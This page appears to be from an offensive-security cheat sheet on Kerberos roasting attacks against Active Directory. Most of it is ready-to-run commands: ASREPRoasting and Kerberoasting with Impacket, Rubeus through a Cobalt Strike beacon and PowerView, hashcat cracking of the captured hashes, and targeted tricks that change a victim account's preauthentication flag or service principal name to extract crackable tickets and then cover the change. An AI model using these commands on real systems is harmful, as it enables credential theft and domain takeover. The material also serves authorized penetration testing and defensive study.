Roasting

Search…
Roasting
ASREPRoasting
Show domain users with DONT_REQ_PREAUTH flag set:
PowerView3 > Get-DomainUser -UACFilter DONT_REQ_PREAUTH
Normal
GetNPUsers.py
​https://vbscrub.com/2020/02/22/impackets-getnpusers-script-explained/​
$ GetNPUsers.py megacorp.local/ -dc-ip 127.0.0.1 -no-pass -usersfile ~/ws/enum/names.txt -request -outputfile asrep.in | tee GetNPUsers.out
$ cat GetNPUsers.out | grep -v 'Client not found in Kerberos database'
$ hashcat -m 18200 -O -a 0 -w 4 --session=asrep -o asrep.out asrep.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
ASREPRoast.ps1
​https://github.com/HarmJ0y/ASREPRoast​
PS > Get-ASREPHash -Domain megacorp.local -UserName snovvcrash
Rubeus
beacon> execute-assembly ADSearch.exe --search "(&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
beacon> execute-assembly Rubeus.exe asreproast /nowrap [/user:svc_mssql]
Targeted
​https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#asreproast​
"Given GenericWrite/GenericAll DACL rights over a target, we can modify most of the user's attributes. We can change a victim's userAccountControl to not require Kerberos preauthentication, grab the user's crackable AS-REP, and then change the setting back." (@harmj0y, ref)
PowerView3 > Get-DomainUser snovvcrash | ConvertFrom-UACValue
PowerView3 > Set-DomainObject -Identity snovvcrash -XOR @{useraccountcontrol=4194304} -Verbose
PowerView3 > Get-DomainUser snovvcrash | ConvertFrom-UACValue
ASREPRoast > Get-ASREPHash -Domain megacorp.local -UserName snovvcrash
PowerView3 > Set-DomainObject -Identity snovvcrash -XOR @{useraccountcontrol=4194304} -Verbose
PowerView3 > Get-DomainUser snovvcrash | ConvertFrom-UACValue
Kerberoasting
​http://www.harmj0y.net/blog/redteaming/rubeus-now-with-more-kekeo/​
​https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/​
​https://github.com/GhostPack/Rubeus#kerberoast​
​https://docs.microsoft.com/ru-ru/archive/blogs/openspecification/windows-configurations-for-kerberos-supported-encryption-type​
​https://swarm.ptsecurity.com/kerberoasting-without-spns/​
​https://habr.com/ru/post/650889/​
​https://m365internals.com/2021/11/08/kerberoast-with-opsec/​
​https://github.com/Luct0r/KerberOPSEC​
​https://redcanary.com/blog/marshmallows-and-kerberoasting/​
Check msDS-SupportedEncryptionTypes attribute (if RC4 is enabled):
PowerView3 > Get-DomainUser -Identity snovvcrash -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
Normal
GetUserSPNs.py
$ GetUserSPNs.py megacorp.local/snovvcrash:'Passw0rd!' -dc-ip 127.0.0.1 -request -outputfile tgsrep.in
$ hashcat -m 13100 -O -a 0 -w 4 --session=tgsrep -o tgsrep.out tgsrep.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
In case LDAP(S) ports are blocked, kerberoasting can be performed via the Global Catalog port (3268/TCP). For that purposes change ldap:// scheme to gc://.
Check if there're any brutable kerberoastable users with a path to high value targets having got cracked NTDS (useful when writing a report):
$ cat ~/ws/enum/tgsrep.in | grep -Pho 'krb5tgs\$23\$.*?\#x27; | cut -d'*' -f2 | cut -d'#x27; -f1 > t
​
$ for acc in `cat t`; do grep -ai $acc ~/ws/loot/ntds.cracked | cut -d: -f1 >> t2; done && rm t
​
$ vi t2
...convert domain prefix to domain suffix (megacorp.local\svcsql -> [email protected])...
​
$ python3 max.py -u neo4j -p 'WeaponizeK4li!' mark-owned -f t2 --add-note "kerberoasted" && rm t2
​
$ python3 max.py -u neo4j -p 'WeaponizeK4li!' query -q 'MATCH p=shortestPath((n {owned:true})-[:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin|ReadGMSAPassword|HasSIDHistory|CanPSRemote*1..5]->(m {highvalue:true})) WHERE NOT n=m RETURN p' --path
PowerView
​https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1​
PowerView3 > Invoke-Kerberoast -OutputFormat Hashcat | fl
Rubeus
​https://github.com/GhostPack/Rubeus​
beacon> execute-assembly ADSearch.exe --search "(&(sAMAccountType=805306368)(servicePrincipalName=*))"
beacon> execute-assembly Rubeus.exe kerberoast /format:hashcat /nowrap [/usetgtdeleg] [/user:svc_mssql]
Targeted
"We can execute 'normal' Kerberoasting instead: given modification rights on a target, we can change the user's serviceprincipalname to any SPN we want (even something fake), Kerberoast the service ticket, and then repair the serviceprincipalname value." (@harmj0y, ref)
PowerView3 > Get-DomainUser snovvcrash | select serviceprincipalname
PowerView3 > Set-DomainObject -Identity snovvcrash -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
PowerView3 > $User = Get-DomainUser snovvcrash 
PowerView3 > $User | Get-DomainSPNTicket | fl
PowerView3 > $User | select serviceprincipalname
PowerView3 > Set-DomainObject -Identity snovvcrash -Clear serviceprincipalname
Downgrading Encryption Type (RC4)
​https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1​
​https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled​
​https://vbscrub.com/tag/kerberos/​
RID Cycling
SCCM Abuse
Last modified 18d ago
Copy link
Outline
Downgrading Encryption Type (RC4)